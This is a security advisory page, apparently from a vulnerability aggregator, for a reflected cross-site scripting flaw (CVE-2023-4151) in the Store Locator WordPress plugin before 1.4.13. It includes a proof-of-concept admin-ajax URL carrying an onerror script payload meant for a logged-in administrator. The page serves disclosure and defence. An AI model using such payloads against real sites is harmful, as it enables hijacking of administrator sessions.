Lucene search
Tnt24WPEX-ID:C9D80AA4-A26D-4B3F-B7BF-9D2FB0560D7BHistoryAug 10, 2023 - 12:00 a.m.
Store Locator WordPress < 1.4.13 - Reflected XSS
2023-08-1000:00:00
tnt24
30
wordpress
reflected xss
store locator
admin
url
exploit
security
Description The plugin does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open the URL below
https://example.com/wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`XSS`>Related
cvelist
cvelist
CVE-2023-4151 Store Locator WordPress < 1.4.13 - Reflected XSS
2023-09-04 11:26:58
cve
cve
CVE-2023-4151
2023-09-04 12:15:10
wpvulndb
wpvulndb
Store Locator WordPress < 1.4.13 - Reflected XSS
2023-08-10 00:00:00
prion
prion
Cross site scripting
2023-09-04 12:15:00
nvd
nvd
CVE-2023-4151
2023-09-04 12:15:10
6 Medium
AI Score
Confidence
High
0.0005 Low
EPSS
Percentile
17.0%
Related for WPEX-ID:C9D80AA4-A26D-4B3F-B7BF-9D2FB0560D7B